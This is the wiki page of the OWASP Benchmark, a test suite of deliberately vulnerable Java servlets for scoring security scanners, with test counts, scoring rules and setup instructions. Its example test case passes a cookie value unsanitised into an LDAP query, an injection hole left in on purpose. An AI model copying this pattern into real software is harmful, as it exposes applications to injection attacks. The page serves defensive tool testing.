! style=&amp;quot;background:#DDDDDD&amp;quot; | &lt;br /&gt;
! Total TP&lt;br /&gt;
! Total FN&lt;br /&gt;
! Total TN&lt;br /&gt;
! Total FP&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Total TC&lt;br /&gt;
! Average TPR&lt;br /&gt;
! Average FPR&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Average Score&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Code Repo and Build/Run Instructions ==&lt;br /&gt;
&lt;br /&gt;
See the '''Getting Started''' and '''Getting, Building, and Running the Benchmark''' sections on the Quick Start tab.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
The OWASP Benchmark is free to use under the [http://choosealicense.com/licenses/gpl-2.0/ GNU General Public License v2.0].&lt;br /&gt;
&lt;br /&gt;
== Mailing List ==&lt;br /&gt;
&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/owasp-benchmark-project OWASP Benchmark Mailing List]&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/User:Wichers Dave Wichers] [mailto:dave.wichers@owasp.org @]&lt;br /&gt;
&lt;br /&gt;
== Project References ==&lt;br /&gt;
* [https://www.mir-swamp.org/#packages/public Software Assurance Marketplace (SWAMP) - set of curated packages to test tools against]&lt;br /&gt;
* [http://samate.nist.gov/Other_Test_Collections.html SAMATE List of Test Collections]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [http://samate.nist.gov/SARD/testsuite.php NSA's Juliet for Java]&lt;br /&gt;
* [http://sectoolmarket.com/ The Web Application Vulnerability Scanner Evaluation Project (WAVSEP)]&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
All test code and project files can be downloaded from [https://github.com/OWASP/benchmark OWASP GitHub].&lt;br /&gt;
&lt;br /&gt;
== Project Intro Video ==&lt;br /&gt;
&lt;br /&gt;
[[File:BenchmarkPodcastTitlePage.jpg|200px|link=https://www.youtube.com/watch?v=HQP8dwc3jJA&amp;amp;index=5&amp;amp;list=PLGB2s-U5FSWOmEStMt3JqlMFJvRYqeVW5]]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* LOOKING FOR VOLUNTEERS!! - We are looking for individuals and organizations to join and make this a much more community driven project, including additional coleaders to help take this project to the next level. Contributors could work on things like new test cases, additional tool scorecard generators, adding support for languages beyond Java, and a host of other improvements. Please contact [mailto:dave.wichers@owasp.org me] if you are interested in contributing at any level.&lt;br /&gt;
* June 5, 2016 - Benchmark Version 1.2 Released&lt;br /&gt;
* Sep 24, 2015 - Benchmark introduced to broader OWASP community at [https://appsecusa2015.sched.org/event/3r9k/using-the-owasp-benchmark-to-assess-automated-vulnerability-analysis-tools AppSec USA]&lt;br /&gt;
* Aug 27, 2015 - U.S. Dept. of Homeland Security (DHS) is financially supporting the Benchmark project.&lt;br /&gt;
* Aug 15, 2015 - Benchmark Version 1.2beta Released with full DAST Support. Checkmarx and ZAP scorecard generators also released.&lt;br /&gt;
* July 10, 2015 - Benchmark Scorecard generator and open source scorecards released&lt;br /&gt;
* May 23, 2015 - Benchmark Version 1.1 Released&lt;br /&gt;
* April 15, 2015 - Benchmark Version 1.0 Released&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [http://choosealicense.com/licenses/gpl-2.0/ GNU General Public License v2.0]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Test Cases =&lt;br /&gt;
&lt;br /&gt;
Version 1.0 of the Benchmark was published on April 15, 2015 and had 20,983 test cases. On May 23, 2015, version 1.1 of the Benchmark was released. The 1.1 release improves on the previous version by making sure that there are both true positives and false positives in every vulnerability area. Version 1.2 was released on June 5, 2016 (and the 1.2beta August 15, 2015).&lt;br /&gt;
&lt;br /&gt;
Version 1.2 and forward of the Benchmark is a fully executable web application, which means it is scannable by any kind of vulnerability detection tool. The 1.2 has been limited to slightly less than 3,000 test cases, to make it easier for DAST tools to scan it (so it doesn't take so long and they don't run out of memory, or blow up the size of their database). The 1.2 release covers the same vulnerability areas that 1.1 covers. We added a few Spring database SQL Injection tests, but that's it. The bulk of the work was turning each test case into something that actually runs correctly AND is fully exploitable, and then generating a UI on top of it that works in order to turn the test cases into a real running application.&lt;br /&gt;
&lt;br /&gt;
You can still download Benchmark version 1.1 by cloning the release marked with the GIT tag '1.1'.&lt;br /&gt;
&lt;br /&gt;
The test case areas and quantities for the Benchmark releases are:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable nowraplinks&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Vulnerability Area&lt;br /&gt;
! # of Tests in v1.1&lt;br /&gt;
! # of Tests in v1.2&lt;br /&gt;
! CWE Number&lt;br /&gt;
|-&lt;br /&gt;
| [[Command Injection]]&lt;br /&gt;
| 2708&lt;br /&gt;
| 251&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/78.html 78]&lt;br /&gt;
|-&lt;br /&gt;
| Weak Cryptography&lt;br /&gt;
| 1440&lt;br /&gt;
| 246&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/327.html 327]&lt;br /&gt;
|-&lt;br /&gt;
| Weak Hashing&lt;br /&gt;
| 1421&lt;br /&gt;
| 236&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/328.html 328]&lt;br /&gt;
|-&lt;br /&gt;
| [[LDAP injection | LDAP Injection]]&lt;br /&gt;
| 736&lt;br /&gt;
| 59&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/90.html 90]&lt;br /&gt;
|-&lt;br /&gt;
| [[Path Traversal]]&lt;br /&gt;
| 2630&lt;br /&gt;
| 268&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/22.html 22]&lt;br /&gt;
|-&lt;br /&gt;
| Secure Cookie Flag&lt;br /&gt;
| 416&lt;br /&gt;
| 67&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/614.html 614]&lt;br /&gt;
|-&lt;br /&gt;
| [[SQL Injection]]&lt;br /&gt;
| 3529&lt;br /&gt;
| 504&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/89.html 89]&lt;br /&gt;
|-&lt;br /&gt;
| [[Trust Boundary Violation]]&lt;br /&gt;
| 725&lt;br /&gt;
| 126&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/501.html 501]&lt;br /&gt;
|-&lt;br /&gt;
| Weak Randomness&lt;br /&gt;
| 3640&lt;br /&gt;
| 493&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/330.html 330]&lt;br /&gt;
|-&lt;br /&gt;
| [[XPATH Injection]]&lt;br /&gt;
| 347&lt;br /&gt;
| 35&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/643.html 643]&lt;br /&gt;
|-&lt;br /&gt;
| [[XSS]] (Cross-Site Scripting)&lt;br /&gt;
| 3449&lt;br /&gt;
| 455&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/79.html 79]&lt;br /&gt;
|-&lt;br /&gt;
| Total Test Cases&lt;br /&gt;
| 21,041&lt;br /&gt;
| 2,740&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Each Benchmark version comes with a spreadsheet that lists every test case, the vulnerability category, the CWE number, and the expected result (true finding/false positive). Look for the file: expectedresults-VERSION#.csv in the project root directory.&lt;br /&gt;
&lt;br /&gt;
Every test case is:&lt;br /&gt;
* a servlet or JSP (currently they are all servlets, but we plan to add JSPs)&lt;br /&gt;
* either a true vulnerability or a false positive for a single issue&lt;br /&gt;
&lt;br /&gt;
The Benchmark is intended to help determine how well analysis tools correctly analyze a broad array of application and framework behavior, including:&lt;br /&gt;
&lt;br /&gt;
* HTTP request and response problems&lt;br /&gt;
* Simple and complex data flow&lt;br /&gt;
* Simple and complex control flow&lt;br /&gt;
* Popular frameworks&lt;br /&gt;
* Inversion of control&lt;br /&gt;
* Reflection&lt;br /&gt;
* Class loading&lt;br /&gt;
* Annotations&lt;br /&gt;
* Popular UI technologies (particularly JavaScript frameworks)&lt;br /&gt;
&lt;br /&gt;
Not all of these are yet tested by the Benchmark but future enhancements intend to provide more coverage of these issues.&lt;br /&gt;
&lt;br /&gt;
Additional future enhancements could cover:&lt;br /&gt;
* All vulnerability types in the [[Top10 | OWASP Top 10]]&lt;br /&gt;
* Does the tool find flaws in libraries?&lt;br /&gt;
* Does the tool find flaws spanning custom code and libraries?&lt;br /&gt;
* Does tool handle web services? REST, XML, GWT, etc…&lt;br /&gt;
* Does tool work with different app servers? Java platforms?&lt;br /&gt;
&lt;br /&gt;
== Example Test Case ==&lt;br /&gt;
&lt;br /&gt;
Each test case is a simple Java EE servlet. BenchmarkTest00001 in version 1.0 of the Benchmark was an LDAP Injection test with the following metadata in the accompanying BenchmarkTest00001.xml file:&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;test-metadata&amp;gt;&lt;br /&gt;
    &amp;lt;category&amp;gt;ldapi&amp;lt;/category&amp;gt;&lt;br /&gt;
    &amp;lt;test-number&amp;gt;00001&amp;lt;/test-number&amp;gt;&lt;br /&gt;
    &amp;lt;vulnerability&amp;gt;true&amp;lt;/vulnerability&amp;gt;&lt;br /&gt;
    &amp;lt;cwe&amp;gt;90&amp;lt;/cwe&amp;gt;&lt;br /&gt;
  &amp;lt;/test-metadata&amp;gt;&lt;br /&gt;
&lt;br /&gt;
BenchmarkTest00001.java in the OWASP Benchmark 1.0 simply reads in all the cookie values, looks for a cookie named &amp;quot;foo&amp;quot;, and uses the value of this cookie when performing an LDAP query. Here's the code for BenchmarkTest00001.java:&lt;br /&gt;
&lt;br /&gt;
  package org.owasp.benchmark.testcode;&lt;br /&gt;
  &lt;br /&gt;
  import java.io.IOException;&lt;br /&gt;
  &lt;br /&gt;
  import javax.servlet.ServletException;&lt;br /&gt;
  import javax.servlet.annotation.WebServlet;&lt;br /&gt;
  import javax.servlet.http.HttpServlet;&lt;br /&gt;
  import javax.servlet.http.HttpServletRequest;&lt;br /&gt;
  import javax.servlet.http.HttpServletResponse;&lt;br /&gt;
  &lt;br /&gt;
  @WebServlet(&amp;quot;/BenchmarkTest00001&amp;quot;)&lt;br /&gt;
  public class BenchmarkTest00001 extends HttpServlet {&lt;br /&gt;
  	&lt;br /&gt;
  	private static final long serialVersionUID = 1L;&lt;br /&gt;
  	&lt;br /&gt;
  	@Override&lt;br /&gt;
  	public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {&lt;br /&gt;
  		doPost(request, response);&lt;br /&gt;
  	}&lt;br /&gt;
  &lt;br /&gt;
  	@Override&lt;br /&gt;
  	public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {&lt;br /&gt;
  		// some code&lt;br /&gt;
  &lt;br /&gt;
  		javax.servlet.http.Cookie[] cookies = request.getCookies();&lt;br /&gt;
  		&lt;br /&gt;
  		String param = null;&lt;br /&gt;
  		boolean foundit = false;&lt;br /&gt;
  		if (cookies != null) {&lt;br /&gt;
  			for (javax.servlet.http.Cookie cookie : cookies) {&lt;br /&gt;
  				if (cookie.getName().equals(&amp;quot;foo&amp;quot;)) {&lt;br /&gt;
  					param = cookie.getValue();&lt;br /&gt;
  					foundit = true;&lt;br /&gt;
  				}&lt;br /&gt;
  			}&lt;br /&gt;
  			if (!foundit) {&lt;br /&gt;
  				// no cookie found in collection&lt;br /&gt;
  				param = &amp;quot;&amp;quot;;&lt;br /&gt;
  			}&lt;br /&gt;
  		} else {&lt;br /&gt;
  			// no cookies&lt;br /&gt;
  			param = &amp;quot;&amp;quot;;&lt;br /&gt;
  		}&lt;br /&gt;
  		&lt;br /&gt;
  		try {&lt;br /&gt;
  			javax.naming.directory.DirContext dc = org.owasp.benchmark.helpers.Utils.getDirContext();&lt;br /&gt;
  			Object[] filterArgs = {&amp;quot;a&amp;quot;,&amp;quot;b&amp;quot;};&lt;br /&gt;
  			dc.search(&amp;quot;name&amp;quot;, param, filterArgs, new javax.naming.directory.SearchControls());&lt;br /&gt;
  		} catch (javax.naming.NamingException e) {&lt;br /&gt;
  			throw new ServletException(e);&lt;br /&gt;
  		}&lt;br /&gt;
  	}&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
= Test Case Details =&lt;br /&gt;
&lt;br /&gt;
The following describes situations in the Benchmark that have come up for debate as to the validity/accuracy of the test cases in these scenarios. &lt;br /&gt;
&lt;br /&gt;
== Cookies as a Source of Attack for XSS ==&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.1 and early versions of the 1.2beta included test cases that used cookies as a source of data that flowed into XSS vulnerabilities. The Benchmark treated these tests as False Positives because the Benchmark team figured that you'd have to use an XSS vulnerability in the first place to set the cookie value, and so it wasn't fair/reasonable to consider an XSS vulnerability whose data source was a cookie value as actually exploitable. However, we got feedback from some tool vendors, like Fortify, Burp, and Arachni, that they disagreed with this analysis and felt that, in fact, cookies were a valid source of attack against XSS vulnerabilities. Given that there are good arguments on both sides of this safe vs. unsafe question, we decided on Aug 25, 2015 to simply remove those test cases from the Benchmark. If, in the future, we decide who is right, we may add such test cases back in.&lt;br /&gt;
&lt;br /&gt;
== Headers as a Source of Attack for XSS ==&lt;br /&gt;
&lt;br /&gt;
Similarly, the Benchmark team believes that the names of headers aren't a valid source of XSS attack for the same reason we thought cookie values aren't a valid source. Because it would require an XSS vulnerability to be exploited in the first place to set them. In fact, we feel that this argument is much stronger for header names, than cookie values. Right now, the Benchmark doesn't include any header names as sources for XSS test cases, but we plan to add them, and mark them as false positive in the Benchmark.&lt;br /&gt;
&lt;br /&gt;
We do have header values as sources for some XSS test cases in the Benchmark and only 'referer' is treated as a valid XSS source (i.e., true positives) because other headers are not viable XSS sources. Other headers are, of course, valid sources for other attack vectors, like SQL injection or Command Injection.&lt;br /&gt;
&lt;br /&gt;
== False Positive Scenario: Static Values Passed to Unsafe (Weak) Sinks ==&lt;br /&gt;
&lt;br /&gt;
The Benchmark has MANY test cases where unsafe data flows in from the browser, but that data is replaced with static content as it goes through the propagators in the that specific test case. This static (safe) data then flows to the sink, which may be a weak/unsafe sink, like, for example, an unsafely constructed SQL statement. The Benchmark treats those test cases as false positives because there is absolutely no way for that weakness to be exploited. The NSA Juliet SAST benchmark treats such test cases exactly the same way, as false positives. We do recognize that there are weaknesses in those test cases, even though they aren't exploitable.&lt;br /&gt;
&lt;br /&gt;
Some SAST tool vendors feel it is appropriate to point out those weaknesses, and that's fine. However, if the tool points those weaknesses out, and does not distinguish them from truly exploitable vulnerabilities, then the Benchmark treats those findings as false positives. If the tool allows a user to differentiate these non-exploitable weaknesses from exploitable vulnerabilities, then the Benchmark scorecard generator can use that information to filter out these extra findings (along with any other similarly marked findings) so they don't count against that tool when calculating that tool's Benchmark score.  In the real world, its important for analysts to be able to filter out such findings if they only have time to deal with the most critical, actually exploitable, vulnerabilities. If a tool doesn't make it easy for an analyst to distinguish the two situations, then they are providing a disservice to the analyst.&lt;br /&gt;
&lt;br /&gt;
This issue doesn't affect DAST tools. They only report what appears to be exploitable to them. So this has no affect on them.&lt;br /&gt;
&lt;br /&gt;
If you are a SAST tool vendor or user, and you believe the Benchmark scorecard generator is counting such findings against that tool, and there is a way to tell them apart, please let the project team know so the scorecard generator can be adjusted to not count those findings against the tool. The Benchmark project's goal is the generate the most fair and accurate results it can generate. If such an adjustment is made to how a scorecard is generated for that tool, we plan to document this was done for that tool, and explain how others could perform the same filtering within that tool in order to get the same focused set of results.&lt;br /&gt;
&lt;br /&gt;
== Dead Code ==&lt;br /&gt;
&lt;br /&gt;
Some SAST tools point out weaknesses in dead code because they might eventually end up being used, and serve as bad coding examples (think cut/paste of code). We think this is fine/appropriate.  However, there is no dead code in the OWASP Benchmark (at least not intentionally). So dead code should not be causing any tool to report unnecessary false positives.&lt;br /&gt;
&lt;br /&gt;
= Tool Support/Results =&lt;br /&gt;
&lt;br /&gt;
The results for 5 free tools, PMD, FindBugs, FindBugs with the FindSecBugs plugin, SonarQube and OWASP ZAP are available here against version 1.2 of the Benchmark: https://rawgit.com/OWASP/Benchmark/master/scorecard/OWASP_Benchmark_Home.html. We've included multiple versions of FindSecBugs' and ZAP's results so you can see the improvements they are making finding vulnerabilities in Benchmark.&lt;br /&gt;
&lt;br /&gt;
We have Benchmark results for all the following tools, but haven't publicly released the results for any commercial tools. However, we included a 'Commercial Average' page, which includes a summary of results for 6 commercial SAST tools along with anonymous versions of each SAST tool's scorecard.&lt;br /&gt;
&lt;br /&gt;
The Benchmark can generate results for the following tools: &lt;br /&gt;
&lt;br /&gt;
'''Free Static Application Security Testing (SAST) Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [http://pmd.sourceforge.net/ PMD] (which really has no security rules) - .xml results file&lt;br /&gt;
* [http://findbugs.sourceforge.net/ Findbugs] - .xml results file&lt;br /&gt;
* FindBugs with the [http://h3xstream.github.io/find-sec-bugs/ FindSecurityBugs plugin] - .xml results file&lt;br /&gt;
* [http://www.sonarqube.org/downloads/ SonarQube] - .xml results file&lt;br /&gt;
* [http://www.rigs-it.net/index.php/product.html XANITIZER] - (Requires registration to download) - xml results file&lt;br /&gt;
&lt;br /&gt;
Note: We looked into supporting [http://checkstyle.sourceforge.net/ Checkstyle] but it has no security rules, just like PMD. The [http://fb-contrib.sourceforge.net/ fb-contrib] FindBugs plugin doesn't have any security rules either. We did test [http://errorprone.info/ Error Prone], and found that it does report some use of [http://errorprone.info/bugpattern/InsecureCipherMode) insecure ciphers (CWE-327)], but that's it.&lt;br /&gt;
&lt;br /&gt;
'''Commercial SAST Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [https://www.checkmarx.com/technology/static-code-analysis-sca/ Checkmarx CxSAST] - .xml results file&lt;br /&gt;
* [http://www.coverity.com/products/code-advisor/ Coverity Code Advisor (On-Demand and stand-alone versions)] - .json results file&lt;br /&gt;
* [http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/index.html HP Fortify (On-Demand and stand-alone versions)] - .fpr results file&lt;br /&gt;
* [http://www-03.ibm.com/software/products/en/appscan-source IBM AppScan Source] - .ozasmt results file&lt;br /&gt;
* [http://www.juliasoft.com/eng/solutions/overview Julia Analyzer] - .xml results file&lt;br /&gt;
* [http://www.parasoft.com/product/jtest/ Parasoft Jtest] - .xml results file&lt;br /&gt;
* [https://www.sourcemeter.com/features/ SourceMeter] - .txt results file of ALL results from VulnerabilityHunter&lt;br /&gt;
* [http://www.veracode.com/products/binary-static-analysis-sast Veracode SAST] - .xml results file&lt;br /&gt;
&lt;br /&gt;
We are looking for results for other commercial static analysis tools like: [http://www.grammatech.com/codesonar Grammatech CodeSonar], [http://www.klocwork.com/products-services/klocwork Klocwork], etc. If you have a license for any static analysis tool not already listed above and can run it on the Benchmark and send us the results file that would be very helpful. &lt;br /&gt;
&lt;br /&gt;
The free SAST tools come bundled with the Benchmark so you can run them yourselves. If you have a license for any commercial SAST tool, you can also run them against the Benchmark. Just put your results files in the /results folder of the project, and then run the BenchmarkScore script for your platform (.sh / .bat) and it will generate a scorecard in the /scorecard directory for all the tools you have results for that are currently supported.&lt;br /&gt;
&lt;br /&gt;
'''Free Dynamic Application Security Testing (DAST) Tools:'''&lt;br /&gt;
&lt;br /&gt;
Note: While we support scorecard generators for these Free and Commercial DAST tools, we haven't been able to get a full/clean run against the Benchmark from most of these tools. As such, some of these scorecard generators might still need some work to properly reflect their results. If you notice any problems, let us know.&lt;br /&gt;
&lt;br /&gt;
* [http://www.arachni-scanner.com/ Arachni] - .xml results file&lt;br /&gt;
** To generate .xml, run: ./bin/arachni_reporter &amp;quot;Your_AFR_Results_Filename.afr&amp;quot; --reporter=xml:outfile=Benchmark1.2-Arachni.xml&lt;br /&gt;
* [https://www.owasp.org/index.php/ZAP OWASP ZAP] - .xml results file&lt;br /&gt;
&lt;br /&gt;
'''Commercial DAST Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [https://www.acunetix.com/vulnerability-scanner/ Acunetix Web Vulnerability Scanner (WVS)] - .xml results file (Generated using [http://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/ command line interface] /ExportXML switch)&lt;br /&gt;
* [https://portswigger.net/burp/ Burp Pro] - .xml results file&lt;br /&gt;
**You must use Burp Pro v1.6.30+ to scan the Benchmark due to a limitation fixed in v1.6.30.&lt;br /&gt;
* [http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/ HP WebInspect] - .xml results file&lt;br /&gt;
* [http://www-03.ibm.com/software/products/en/appscan IBM AppScan] - .xml results file&lt;br /&gt;
* [https://www.netsparker.com/web-vulnerability-scanner/ Netsparker] - .xml results file&lt;br /&gt;
* [http://www.rapid7.com/products/appspider/ Rapid7 AppSpider] - .xml results file&lt;br /&gt;
&lt;br /&gt;
* Qualys - We ran Qualys against v1.2 of the Benchmark and it found none of the vulnerabilities we test for as far as we could tell. So we haven't implemented a scorecard generator for it. If you get results where you think it does find some real issues, send us the results file and, if confirmed, we'll produce a scorecard generator for it.&lt;br /&gt;
&lt;br /&gt;
If you have access to other DAST Tools, PLEASE RUN THEM FOR US against the Benchmark, and send us the results file so we can build a scorecard generator for that tool.&lt;br /&gt;
&lt;br /&gt;
'''Commercial Interactive Application Security Testing (IAST) Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [http://www.contrastsecurity.com/features Contrast] - .zip results file&lt;br /&gt;
&lt;br /&gt;
'''Commercial Hybrid Analysis Application Security Testing Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [http://www.iappsecure.com/products.html Fusion Lite Insight] - .xml results file&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''WARNING: If you generate results for a commercial tool, be careful who you distribute it to. Each tool has its own license defining when any results it produces can be released/made public. It may be against the terms of a commercial tool's license to publicly release that tool's score against the OWASP Benchmark. The OWASP Benchmark project takes no responsibility if someone else releases such results.'''&lt;br /&gt;
&lt;br /&gt;
The project has automated test harnesses for these vulnerability detection tools, so we can repeatably run the tools against each version of the Benchmark and automatically produce scorecards in our desired format.&lt;br /&gt;
&lt;br /&gt;
We want to test as many tools as possible against the Benchmark. If you are:&lt;br /&gt;
&lt;br /&gt;
* A tool vendor and want to participate in the project&lt;br /&gt;
* Someone who wants to help score a free tool against the project&lt;br /&gt;
* Someone who has a license to a commercial tool and the terms of the license allow you to publish tool results, and you want to participate&lt;br /&gt;
&lt;br /&gt;
please let [mailto:dave.wichers@owasp.org me] know!&lt;br /&gt;
&lt;br /&gt;
= Quick Start =&lt;br /&gt;
&lt;br /&gt;
==What is in the Benchmark?==&lt;br /&gt;
The Benchmark is a Java Maven project. Its primary component is thousands of test cases (e.g., BenchmarkTest00001.java) , each of which is a single Java servlet that contains a single vulnerability (either a true positive or false positive). The vulnerabilities span about a dozen different types currently and are expected to expand significantly in the future.&lt;br /&gt;
&lt;br /&gt;
An expectedresults.csv is published with each version of the Benchmark (e.g., expectedresults-1.1.csv) and it specifically lists the expected results for each test case. Here’s what the first two rows in this file looks like for version 1.1 of the Benchmark:&lt;br /&gt;
&lt;br /&gt;
 # test name		category	real vulnerability	CWE	Benchmark version: 1.1	2015-05-22&lt;br /&gt;
 BenchmarkTest00001	crypto		TRUE			327&lt;br /&gt;
&lt;br /&gt;
This simply means that the first test case is a crypto test case (use of weak cryptographic algorithms), this is a real vulnerability (as opposed to a false positive), and this issue maps to CWE 327. It also indicates this expected results file is for Benchmark version 1.1 (produced May 22, 2015). There is a row in this file for each of the tens of thousands of test cases in the Benchmark.  Each time a new version of the Benchmark is published, a new corresponding results file is generated and each test case can be completely different from one version to the next.&lt;br /&gt;
&lt;br /&gt;
The Benchmark also comes with a bunch of different utilities, commands, and prepackaged open source security analysis tools, all of which can be executed through Maven goals, including:&lt;br /&gt;
&lt;br /&gt;
* Open source vulnerability detection tools to be run against the Benchmark&lt;br /&gt;
* A scorecard generator, which computes a scorecard for each of the tools you have results files for.&lt;br /&gt;
&lt;br /&gt;
==What Can You Do With the Benchmark?==&lt;br /&gt;
* Compile all the software in the Benchmark project (e.g., mvn compile)&lt;br /&gt;
* Run a static vulnerability analysis tool (SAST) against the Benchmark test case code&lt;br /&gt;
&lt;br /&gt;
* Scan a running version of the Benchmark with a dynamic application security testing tool (DAST)&lt;br /&gt;
** Instructions on how to run it are provided below&lt;br /&gt;
&lt;br /&gt;
* Generate scorecards for each of the tools you have results files for&lt;br /&gt;
** See the Tool Support/Results page for the list of tools the Benchmark supports generating scorecards for&lt;br /&gt;
&lt;br /&gt;
==Getting Started==&lt;br /&gt;
Before downloading or using the Benchmark make sure you have the following installed and configured properly:&lt;br /&gt;
&lt;br /&gt;
 GIT: http://git-scm.com/ or https://github.com/&lt;br /&gt;
 Maven: https://maven.apache.org/  (Version: 3.2.3 or newer works. We heard that 3.0.5 throws an error.)&lt;br /&gt;
 Java: http://www.oracle.com/technetwork/java/javase/downloads/index.html (Java 7 or 8) (64-bit) - Takes ALOT of memory to compile the Benchmark.&lt;br /&gt;
&lt;br /&gt;
==Getting, Building, and Running the Benchmark==&lt;br /&gt;
&lt;br /&gt;
To download and build everything:&lt;br /&gt;
&lt;br /&gt;
 $ git clone https://github.com/OWASP/benchmark &lt;br /&gt;
 $ cd benchmark&lt;br /&gt;
 $ mvn compile   (This compiles it)&lt;br /&gt;
 $ runBenchmark.sh/.bat - This compiles and runs it.&lt;br /&gt;
&lt;br /&gt;
Then navigate to: https://localhost:8443/benchmark/ to go to its home page. It uses a self signed SSL certificate, so you'll get a security warning when you hit the home page.&lt;br /&gt;
&lt;br /&gt;
Note: We have set the Benchmark app to use up to 6 Gig of RAM, which it may need when it is fully scanned by a DAST scanner. The DAST tool probably also requires 3+ Gig of RAM. As such, we recommend having a 16 Gig machine if you are going to try to run a full DAST scan. And at least 4 or ideally 8 Gig if you are going to play around with the running Benchmark app.&lt;br /&gt;
&lt;br /&gt;
== Using a VM instead ==&lt;br /&gt;
We have several preconstructed VMs or instructions on how to build one that you can use instead:&lt;br /&gt;
&lt;br /&gt;
* Docker: A Dockerfile is checked into the project [https://github.com/OWASP/Benchmark/blob/master/VMs/Dockerfile here]. This Docker file should automatically produce a Docker VM that has the latest and greatest version of the Benchmark project files. After you have Docker installed, navigate to this directory and do the following: &lt;br /&gt;
 docker build -t benchmark:v1.2 .   --&amp;gt; This builds the Docker Benchmark VM (This will take a WHILE)&lt;br /&gt;
 docker images   --&amp;gt; You should see this new image in the list provided&lt;br /&gt;
 # The above 2 steps only have to be done once. Then, to run the Benchmark in your Docker VM, just do this:&lt;br /&gt;
 docker run -p 8443:8443 -it benchmark:v1.2 /benchmark/bench.sh  --&amp;gt; Clones Benchmark from github, builds everything, and starts a remotely accessible Benchmark web app.&lt;br /&gt;
 If successful, you should see this at the end:&lt;br /&gt;
   [INFO] [talledLocalContainer] Tomcat 8.x started on port [8443]&lt;br /&gt;
   [INFO] Press Ctrl-C to stop the container...&lt;br /&gt;
 docker-machine ls (in a different window) --&amp;gt; To get IP Docker VM is exporting (e.g., tcp://192.168.99.100:2376)&lt;br /&gt;
 In a browser, navigate to: https://192.168.99.100:8443/benchmark (using the above IP as an example)&lt;br /&gt;
* Amazon Web Services (AWS) - Here's how you set up the Benchmark on an AWS VM:&lt;br /&gt;
&lt;br /&gt;
 sudo yum install git&lt;br /&gt;
 sudo yum install maven&lt;br /&gt;
 sudo yum install mvn&lt;br /&gt;
 sudo wget http://repos.fedorapeople.org/repos/dchen/apache-maven/epel-apache-maven.repo -O /etc/yum.repos.d/epel-apache-maven.repo&lt;br /&gt;
 sudo sed -i s/\$releasever/6/g /etc/yum.repos.d/epel-apache-maven.repo&lt;br /&gt;
 sudo yum install -y apache-maven&lt;br /&gt;
 git clone https://github.com/OWASP/benchmark&lt;br /&gt;
 cd benchmark&lt;br /&gt;
 chmod 755 *.sh&lt;br /&gt;
 ./runBenchmark.sh -- to run it locally on the VM.&lt;br /&gt;
 ./runRemoteAccessibleBenchmark.sh -- to run it so it can be accessed outside the VM (on port 8443).&lt;br /&gt;
&lt;br /&gt;
==Running Free Static Analysis Tools Against the Benchmark==&lt;br /&gt;
There are scripts for running each of the free SAST vulnerability detection tools included with the Benchmark against the Benchmark test cases. On Linux, you might have to make them executable (e.g., chmod 755 *.sh) before you can run them.&lt;br /&gt;
&lt;br /&gt;
